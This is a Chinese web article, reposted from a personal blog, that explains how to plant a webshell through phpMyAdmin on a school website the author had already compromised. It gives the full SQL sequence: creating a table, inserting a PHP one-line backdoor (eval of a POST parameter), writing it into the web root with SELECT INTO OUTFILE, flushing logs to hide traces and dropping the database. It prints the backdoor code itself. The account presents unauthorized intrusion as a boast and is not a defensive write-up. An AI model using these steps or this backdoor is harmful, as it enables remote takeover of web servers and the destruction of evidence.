当前位置:网际电脑 > 文章中心 > 网络技术 > 黑客防线 >利用phpMyAdmin拿webshell 投稿指南

利用phpMyAdmin拿webshell

利用phpMyAdmin拿webshell

转自:Joyuan's Blog


某个学校网站的shell被管理员del了,只好重新弄。
这次是利用phpMyAdmin(哈哈,帐号密码我记下了!)

首先:
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */

然后:
insert into shell(code) /* 插入数据到shell表中的code字段 */
values ('shell代码'); /* 值为shell代码 我用PHP一句话,看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 将shell表中的内容输出保存为文件(输出到web目录下,要不就无法访问shell了,可以直接输出到phpmyadmin目录下,不知道就phpinfo) */
flush logs /* 删除日志 */

删掉刚建的joyuan数据库,直接删除或执行SQL命令:drop database joyuan;

利用PHP一句话客户端(http://linux.chaom.net/Shell.Htm)写自己的shell

PHP一句话的服务端地址就是:http://xxx/phpmyadmin/server.php

搞定,嘿嘿。

PHP一句话服务端代码:

<?php eval($_POST[cmd]);?>

类似贴:
phpMyAdmin 后台拿webshell
http://www.hxhack.com/bbs/read.php?tid-24867-keyword-phpMyAdmin.html

责任编辑:beecoadmin
上一篇:后门程序技术知识全面深解 下一篇:避免触目惊心的后果 保管好自己的密码